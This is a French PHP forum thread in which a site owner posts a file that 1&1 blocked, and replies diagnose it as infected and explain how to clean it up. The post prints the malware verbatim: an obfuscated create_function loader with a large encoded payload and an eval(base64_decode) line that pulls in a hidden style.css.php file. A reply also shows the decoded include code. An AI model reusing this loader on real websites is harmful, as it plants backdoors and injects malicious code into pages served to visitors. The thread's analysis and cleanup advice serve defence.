Fichier bloqué par 1&1, vous parait-il normal ?

Fichier bloqué par 1&1, vous parait-il normal ? - PHP - Programmation

Marsh Posté le 27-08-2014 à 10:46:14    

Bonjour,
 
mon site viens d'être bloqué par 1&1 car un fichier (confserver.php) est trouvé par leur antivirus.
 
je l'ouvre et le voici :
 

Code :
  1. <?php
  2. $md5 = "eb75534cdd8ef9c23f453101cef5358d";
  3. $a4 = array("e",'z',"o","$","6"," )","t",'l',"r","n",'i',"b",'d',"f","c","s","_",";","4",'g',"(",'v','a');
  4. $b48 = create_function('$'.'v',$a4[0].$a4[21].$a4[22].$a4[7].$a4[20].$a4[19].$a4[1].$a4[10].$a4[9].$a4[13].$a4[7].$a4[22].$a4[6].$a4[0].$a4[20].$a4[11].$a4[22].$a4[15].$a4[0].$a4[4].$a4[18].$a4[16].$a4[12].$a4[0].$a4[14].$a4[2].$a4[12].$a4[0].$a4[20].$a4[3].$a4[21].$a4[5].$a4[5].$a4[5].$a4[17]);
  5. $b48('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');
  6. ?>
  7. <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzQ0L2QyOTcwMTgzMzAvaHRkb2NzL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX20')); ?>
  8. <?
  9. $user="blabla";
  10. $password="blablabla";
  11. $localhost = "blabla.1and1.fr";
  12. $database="blabla";
  13. mysql_connect($localhost,$user,$password);
  14. @mysql_select_db($database) or die( "Unable to connect to database1" );
  15. mysql_query("SET NAMES 'utf8'" );
  16. ?>


 
Je ne suis pas expert en informatique et vous demande si quelque chose vous parait suspect dans ce fichier et mérite que mon site soit bloqué...
 
Merci

Reply

Marsh Posté le 27-08-2014 à 10:46:14   

Reply

Marsh Posté le 27-08-2014 à 15:37:50    

Fichier très certainement infecté, verifie même que ce ne soit pas le cas de plusieurs (tous) fichiers.
 
En exécutant ce code (lors d'un accès à ce fichier par le navigateur, ou même pas un include), le code sera interprété par PHP et avoir des effets  peu sympathiques: ouverture d'un accès distant sur la machine, injection de code malicieux dans une page web...
 
Dans tous les cas, pour que ce code soit ici, c'est qu'il existe une faille dans ton application (ou dans une autre application hébergée sur le même serveur).

Reply

Marsh Posté le 27-08-2014 à 15:40:15    

Le coup du eval avec un chaîne encodée en base64 me paraît bien puer du bec :/


---------------
Astres, outil de help-desk GPL : http://sourceforge.net/projects/astres, ICARE, gestion de conf : http://sourceforge.net/projects/icare, Outil Planeta Calandreta : https://framalibre.org/content/planeta-calandreta
Reply

Marsh Posté le 27-08-2014 à 17:27:27    

De la ligne 1 a la ligne 8 c'est très certainement une faille de sécu qui a mis ce code, les 3/4 du temps c'est de la pub en fait qui se cache dans la page, pour gonfler les résultats google.
 
Tu as donc une faille de sécu.
 
Pour le code en base64 (ligne 7), voila ce qui contient quand tu run le base64_decode dessus:

Code :
  1. if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}


 
Je te conseille donc vivement de checker tes fichiers (pour vérifier que d'autres fichiers n'ont pas le même soucis) + aller chercher ce fichier en particulier:
/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php
 
Qui n'a probablement rien de bon dedans, et qui au passage t'indique probablement que la faille vient du module d'upload de fckeditor (vu le path /fckeditor/editor/filemanager il y a de bonne chances que cela vienne de là).
 
Pour rechercher si un fichier contient ou non le code malicieux, place toi la racine, fait un grep en recherchant create_function, eval, et base64.
Les deux premiers ne devraient pas être utilisés dans un code digne de ce nom en production, le dernier peut apparaitre plus facilement y compris dans du code bon.
Tu auras probablement toujours la même structure, 5/6 lignes indéchiffrables à l'oeil nue et en début de fichier, c'est souvent le cas.


Message édité par Devil'sTiger le 27-08-2014 à 17:29:10
Reply

Marsh Posté le 27-08-2014 à 18:06:22    

Pour info, lorsque j'ai ouvert ce topic tu as fait réagir mon propre antivirus qui m'a bloqué l'accès à la page :D.
Effectivement, il faut nettoyer maintenant, Devil'sTiger t'a donné d'excellents conseils. Mets aussi à jour ta version de fckeditor et vois si tu n'as pas un plugin avec une faille.
Tu remercieras 1&1 de t'avoir averti !...


Message édité par TotalRecall le 27-08-2014 à 18:09:26

---------------
Réalisation amplis classe D / T      Topic .Net - C# @ Prog
Reply

Marsh Posté le 27-08-2014 à 21:20:20    

Super, merci pour tous ces conseils.
En virant les 7 premières lignes, le site semble fonctionner sans soucis, donc pas indispensables (voir nuisibles !!)
Je vais scanner mes autres pages.
En tous cas, Eset ne m'a rien bloqué pour ce fichier, mais m'a alerté pour un fichier thumb.php dans phpmyvisite : menace PHP/Obfuscated.F
 
Bref, il y a du ménage à faire. Merci encore
 
Je vais chercher comment decoder ces lignes base64
 
En tous cas, le lien "/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php" ne correspond pas à mon arbo, il n'y a que la fin qui correspond.


Message édité par damdam51 le 27-08-2014 à 21:38:16
Reply

Marsh Posté le 27-08-2014 à 21:44:26    

Oui en réalité cela correspond bien à ton arbo :D
 
Sauf que sur un manager 1&1, un mutualisé en général, une partie de l'arbo est caché pour de simples raisons de sécurité (sinon tu pourrais remonter à d'autres sites d'autres personnes)
.
 
Techniquement, ton arbo doit démarrer vers:
"/kunden/homepages/44/d297018330/"
Ca c'est probablement ton root, voir le htdocs est ton root, avant (donc cette arbo), tu n'y auras pas accès c'est normal.
 
Mais, tu peux demander une lecture d'une arbo en path absolu malgré tout.
 
Créer un fichier php avec ce code dedans:

Code :
  1. <?php
  2. $file = '/kunden/homepages/44/d297018330/htdocs/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';
  4. if (file_exists($file)) {
  5.     header('Content-Description: File Transfer');
  6.     header('Content-Type: application/octet-stream');
  7.     header('Content-Disposition: attachment; filename='.basename($file));
  8.     header('Expires: 0');
  9.     header('Cache-Control: must-revalidate');
  10.     header('Pragma: public');
  11.     header('Content-Length: ' . filesize($file));
  12.     readfile($file);
  13.     exit;
  14. }
  15. ?>


 
Et avec ton navigateur préféré va sur cette page php toute fraiche, il devrait te proposer de téléchargé le dit fichier !
Bien sur, évite de le lancer sur ta propre machine, mais en soit, étant de l'interprété normalement tu devrais récupérer un simple fichier texte que tu pourras éditer/voir, probable qu'il soit compressé comme le reste d'ailleurs, c'est une vielle ruse pour qu'un 'humain' qui se pose pas trop de question, ait beaucoup de mal à se demander si c'est bon ou pas.


Message édité par Devil'sTiger le 27-08-2014 à 21:47:50
Reply

Marsh Posté le 28-08-2014 à 12:07:32    

OK merci pour ces infos et ces conseils bien clairs !
 

Reply

Marsh Posté le 02-09-2014 à 17:54:06    

http://fr.wikipedia.org/wiki/PhpMyVisites
 
En bref :
- phpMyVisites n'est plus supporté / développé / est obsolète depuis bien longtemps maintenant
- tu as été victime d'une faille de phpMyVisites ... corrigée en 2009
 
En résumé :
- utilise des outils plus moderne
- et surtout : vérifie que tout tes scripts, applications, sites ... soient à jour sur ton serveur. Si tu utilise wordpress, ou d'autres choses, il faut tout mettre à jour.


---------------
Kao ..98 - Uplay (R6S) : kao98.7.62x39 - Origin (BF4, BF1) : kntkao98
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed